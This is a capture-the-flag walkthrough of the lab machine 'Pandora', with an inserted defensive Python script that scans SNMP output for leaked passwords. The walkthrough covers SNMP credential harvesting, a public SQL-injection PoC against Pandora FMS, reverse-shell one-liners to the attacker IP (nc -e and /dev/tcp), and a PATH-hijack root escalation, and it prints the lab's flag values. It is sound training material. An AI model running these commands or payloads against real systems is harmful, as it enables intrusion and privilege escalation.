Proof of Concept
10.129.3.150
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
161/udp open snmp

Initial Access
Browsing the web service on port 80, found the domain name in the footer
- Panda.HTB
Configured /etc/hosts
┌──(kali㉿kali)-[~/Pandora]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.3.150 pandora.htb

Found SNMP community string using hydra
- public
┌──(kali㉿kali)-[~/Pandora]
└─$ hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://10.129.3.150
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-19 10:45:34
[DATA] max 16 tasks per 1 server, overall 16 tasks, 118 login tries (l:1/p:118), ~8 tries per task
[DATA] attacking snmp://10.129.3.150:161/
[161][snmp] host: 10.129.3.150 password: public
[STATUS] attack finished for 10.129.3.150 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-02-19 10:45:34

Enumerated SNMP data
┌──(kali㉿kali)-[~/Pandora]
└─$ snmpbulkwalk -v2c -c public 10.129.3.150 | tee snmpwalk.txt
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (208979) 0:34:49.79
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (9) 0:00:00.09
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
<SNIP>

Found user Daniel in SNMP data
┌──(kali㉿kali)-[~/Pandora]
└─$ cat snmpwalk.txt | grep -A 10 -B 10 -i pandora
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (208979) 0:34:49.79
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (9) 0:00:00.09
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4

Found Daniel's credentials in SNMP data
- daniel:HotelBabylon23
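The credentials leak because HOST-RESOURCES-MIB exposes every process's command line through hrSWRunParameters (the iso.3.6.1.2.1.25.4.2.1.5 rows grepped below), so any password passed as an argument is readable by anyone holding the community string. As an added defender-side check that is not part of this writeup, the Python below scans snmpwalk output for such leaks; the flag list and the path heuristic are assumptions, and the sample rows are constructed from the output on this page.

```python
import re

# hrSWRunParameters (HOST-RESOURCES-MIB, 1.3.6.1.2.1.25.4.2.1.5) as snmpwalk prints it without
# MIB names loaded; the last sub-identifier of each row is the PID of the process.
HR_SW_RUN_PARAMETERS = "iso.3.6.1.2.1.25.4.2.1.5."
# One snmpwalk row: <oid> = STRING: "<value>"  (empty values are printed as a bare "").
LINE_RE = re.compile(r'^(?P<oid>\S+) = (?:STRING: )?"(?P<val>.*)"$')
# Flags that usually carry a secret as the next token or after '=' (assumed list, extend as needed).
SECRET_FLAG_RE = re.compile(r'(?:^|\s)(?P<flag>-p|-P|--password|--pass)(?:\s+|=)(?P<val>\S+)')

def parse_run_parameters(walk_text):
    """Return {pid: argument string} for every hrSWRunParameters row in the walk."""
    params = {}
    for line in walk_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m and m.group("oid").startswith(HR_SW_RUN_PARAMETERS):
            pid = int(m.group("oid")[len(HR_SW_RUN_PARAMETERS):])
            params[pid] = m.group("val")
    return params

def looks_like_secret(value):
    """Reject the common non-secret uses of -p: pid/config file paths and option separators."""
    value = value.strip("'\"")
    return bool(value) and not value.startswith(("/", "./", "-"))

def find_leaked_secrets(walk_text):
    """Return (pid, flag, value) for each process whose command line exposes a password.
    Matching runs over the raw string, so arguments nested inside a bash -c '...' are caught too."""
    hits = []
    for pid, args in sorted(parse_run_parameters(walk_text).items()):
        for m in SECRET_FLAG_RE.finditer(args):
            if looks_like_secret(m.group("val")):
                hits.append((pid, m.group("flag"), m.group("val").strip("'\"")))
    return hits

# Constructed sample: rows copied from the snmpwalk output on this page plus one unrelated row.
SAMPLE_WALK = r'''
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.25.4.2.1.5.898 = ""
iso.3.6.1.2.1.25.4.2.1.5.973 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.975 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.990 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.1144 = STRING: "-u daniel -p HotelBabylon23"
'''

if __name__ == "__main__":
    for pid, flag, value in find_leaked_secrets(SAMPLE_WALK):
        # Report where the secret is, not the secret itself.
        print(f"pid {pid}: argument {flag} carries a password ({value[:2]}{'*' * (len(value) - 2)})")
```

The snmpd pid-file argument and getty's `-p --` are deliberately not flagged, which is what the path and separator heuristic exists for.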
┌──(kali㉿kali)-[~/Pandora]
└─$ cat snmpwalk.txt | grep -A 5 -B 5 -i daniel
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (208979) 0:34:49.79
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (9) 0:00:00.09
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
--
iso.3.6.1.2.1.25.4.2.1.5.898 = ""
iso.3.6.1.2.1.25.4.2.1.5.961 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.971 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.972 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.973 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.975 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.977 = ""
iso.3.6.1.2.1.25.4.2.1.5.990 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.1039 = ""
iso.3.6.1.2.1.25.4.2.1.5.1040 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1144 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.1347 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1598 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1791 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1822 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1831 = STRING: "-k start"

Authenticated to SSH service using Daniel's credentials
┌──(kali㉿kali)-[~/Pandora]
└─$ sshpass -p 'HotelBabylon23' ssh daniel@pandora.htb
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 19 Feb 16:18:31 UTC 2026
System load: 0.0
Usage of /: 63.0% of 4.87GB
Memory usage: 8%
Swap usage: 0%
Processes: 234
Users logged in: 0
IPv4 address for eth0: 10.129.3.150
IPv6 address for eth0: dead:beef::250:56ff:feb0:6938
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
daniel@pandora:~$

Lateral Movement (Auth as matt)
Checking /etc/apache2/sites-enabled/pandora.conf revealed a web service reachable only from localhost
daniel@pandora:/etc/apache2$ cat ./sites-enabled/pandora.conf
<VirtualHost localhost:80>
ServerAdmin admin@panda.htb
ServerName pandora.panda.htb
DocumentRoot /var/www/pandora
AssignUserID matt matt
<Directory /var/www/pandora>
AllowOverride All
</Directory>
ErrorLog /var/log/apache2/error.log
CustomLog /var/log/apache2/access.log combined
</VirtualHost>

Configured /etc/hosts
┌──(kali㉿kali)-[~/Pandora]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.3.150 pandora.htb pandora.panda.htb

Set up SSH port forwarding
┌──(kali㉿kali)-[~/Pandora]
└─$ sshpass -p 'HotelBabylon23' ssh -f -N -L 8888:127.0.0.1:80 daniel@10.129.3.150
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
┌──(kali㉿kali)-[~/Pandora]
└─$ ss -nltp | grep 8888
LISTEN 0 128 127.0.0.1:8888 0.0.0.0:* users:(("ssh",pid=617053,fd=5))
LISTEN 0 128 [::1]:8888 [::]:* users:(("ssh",pid=617053,fd=4))

Browsing to http://localhost:8888 showed Pandora FMS v7.0NG.742_FIX_PERL2020 running
- Pandora FMS v7.0NG.742_FIX_PERL2020
This version is affected by a SQL injection vulnerability (CVE-2021-32099)
Downloaded a PoC that uses the SQL injection to obtain the admin account and then executes a shell
┌──(kali㉿kali)-[~/Pandora]
└─$ git clone https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated.git
Cloning into 'Pandora_v7.0NG.742_exploit_unauthenticated'...
remote: Enumerating objects: 14, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 14 (delta 5), reused 3 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (14/14), 5.07 KiB | 1.01 MiB/s, done.
Resolving deltas: 100% (5/5), done.

Ran the PoC
┌──(kali㉿kali)-[~/Pandora/Pandora_v7.0NG.742_exploit_unauthenticated]
└─$ ./sqlpwn.py -t 127.0.0.1:8888
URL: http://127.0.0.1:8888/pandora_console
[+] Sending Injection Payload
[+] Requesting Session
[+] Admin Session Cookie : pc81jt52qba0dt470q1bk0ggh5
[+] Sending Payload
[+] Respose : 200
[+] Pwned :)
[+] If you want manual Control : http://127.0.0.1:8888/pandora_console/images/pwn.php?test=
CMD >

Started an nc reverse shell listener
┌──(kali㉿kali)-[~/Pandora]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...

Ran a reverse shell command in the shell obtained from the PoC
┌──(kali㉿kali)-[~/Pandora/Pandora_v7.0NG.742_exploit_unauthenticated]
└─$ ./sqlpwn.py -t 127.0.0.1:8888
URL: http://127.0.0.1:8888/pandora_console
[+] Sending Injection Payload
[+] Requesting Session
[+] Admin Session Cookie : pc81jt52qba0dt470q1bk0ggh5
[+] Sending Payload
[+] Respose : 200
[+] Pwned :)
[+] If you want manual Control : http://127.0.0.1:8888/pandora_console/images/pwn.php?test=
CMD > busybox nc 10.10.14.111 4444 -e sh

Reverse shell connected
listening on [any] 4444 ...
connect to [10.10.14.111] from (UNKNOWN) [10.129.3.150] 55322
whoami
matt

Read user.txt
matt@pandora:/home/matt$ cat user.txt
cat user.txt
ddc637e35c7769a465a55a35757a43b4
matt@pandora:/home/matt$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:6b:b8 brd ff:ff:ff:ff:ff:ff
inet 10.129.3.150/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2441sec preferred_lft 2441sec
inet6 dead:beef::250:56ff:feb0:6bb8/64 scope global dynamic mngtmpaddr
valid_lft 86397sec preferred_lft 14397sec
inet6 fe80::250:56ff:feb0:6bb8/64 scope link
valid_lft forever preferred_lft forever

Privilege Escalation
Since later steps did not work properly in the current shell, generated an SSH key pair to open a new shell session
┌──(kali㉿kali)-[~/Pandora]
└─$ ssh-keygen -t rsa -b 4096 -f ./id_rsa
Generating public/private rsa key pair.
Enter passphrase for "./id_rsa" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa
Your public key has been saved in ./id_rsa.pub
The key fingerprint is:
SHA256:hgDnmIfiqgJd57w57ZMTIOWwyxWyjfSMwlM0f63iLR4 kali@kali
The key's randomart image is:
+---[RSA 4096]----+
| ..+ |
| B=oo . |
|..+o+&... . |
|..+.B.Oo . |
| o = Bo.S |
|o . o.o+. |
|o E+.o |
|o .+o= |
|o .o.o |
+----[SHA256]-----+

Started a file server
┌──(kali㉿kali)-[~/Pandora]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Registered the generated id_rsa.pub on the target machine
matt@pandora:/home/matt$ mkdir .ssh
mkdir .ssh
matt@pandora:/home/matt$ cd .ssh
cd .ssh
matt@pandora:/home/matt/.ssh$ curl -O http://10.10.14.111:8000/id_rsa.pub
curl -O http://10.10.14.111:8000/id_rsa.pub
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 735 100 735 0 0 1472 0 --:--:-- --:--:-- --:--:-- 1470
matt@pandora:/home/matt/.ssh$ mv id_rsa.pub authorized_keys
mv id_rsa.pub authorized_keys
matt@pandora:/home/matt/.ssh$ chmod 600 authorized_keys
chmod 600 authorized_keys

Connected over SSH using the generated id_rsa
┌──(kali㉿kali)-[~/Pandora]
└─$ ssh -i id_rsa matt@pandora.htb
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 20 Feb 07:11:25 UTC 2026
System load: 0.02
Usage of /: 63.2% of 4.87GB
Memory usage: 14%
Swap usage: 0%
Processes: 243
Users logged in: 0
IPv4 address for eth0: 10.129.3.150
IPv6 address for eth0: dead:beef::250:56ff:feb0:6bb8
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
matt@pandora:~$

Enumerating SetUID binaries revealed /usr/bin/pandora_backup
matt@pandora:/home/matt$ find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 166056 Jan 19 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 31032 May 26 2021 /usr/bin/pkexec
-rwsr-xr-x 1 root root 85064 Jul 14 2021 /usr/bin/chfn
-rwsr-xr-x 1 root root 44784 Jul 14 2021 /usr/bin/newgrp
-rwsr-xr-x 1 root root 88464 Jul 14 2021 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39144 Jul 21 2020 /usr/bin/umount
-rwsr-x--- 1 root matt 16816 Dec 3 2021 /usr/bin/pandora_backup
-rwsr-xr-x 1 root root 68208 Jul 14 2021 /usr/bin/passwd
-rwsr-xr-x 1 root root 55528 Jul 21 2020 /usr/bin/mount
-rwsr-xr-x 1 root root 67816 Jul 21 2020 /usr/bin/su
-rwsr-sr-x 1 daemon daemon 55560 Nov 12 2018 /usr/bin/at
-rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 53040 Jul 14 2021 /usr/bin/chsh
-rwsr-xr-x 1 root root 473576 Jul 23 2021 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 51344 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14488 Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 22840 May 26 2021 /usr/lib/policykit-1/polkit-agent-helper-1

Found that the pandora_backup binary invokes the tar command (by relative name) to back up files
┌──(kali㉿kali)-[~/Pandora]
└─$ strings pandora_backup
/lib64/ld-linux-x86-64.so.2
puts
setreuid
system
getuid
geteuid
__cxa_finalize
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*

Created a tar shell script in /tmp that opens a reverse shell
matt@pandora:/tmp$ cat /tmp/tar
#!/bin/bash
bash -c 'sh -i >& /dev/tcp/10.10.14.111/4444 0>&1'
matt@pandora:/tmp$ chmod a+x tar

Started a reverse shell listener
┌──(kali㉿kali)-[~/Pandora]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...

Prepended /tmp to PATH and ran /usr/bin/pandora_backup
matt@pandora:/tmp$ export PATH=/tmp:$PATH
matt@pandora:/tmp$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
^C^CBackup failed!
Check your permissions!

Reverse shell connected as root
┌──(kali㉿kali)-[~/Pandora]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.111] from (UNKNOWN) [10.129.3.150] 34108
# whoami
root

Read root.txt
root@pandora:/root# cat root.txt
cat root.txt
71ffb89650d34e9edf81de26ab443c56
root@pandora:/root# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:6b:b8 brd ff:ff:ff:ff:ff:ff
inet 10.129.3.150/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 3424sec preferred_lft 3424sec
inet6 dead:beef::250:56ff:feb0:6bb8/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:feb0:6bb8/64 scope link
valid_lft forever preferred_lft forever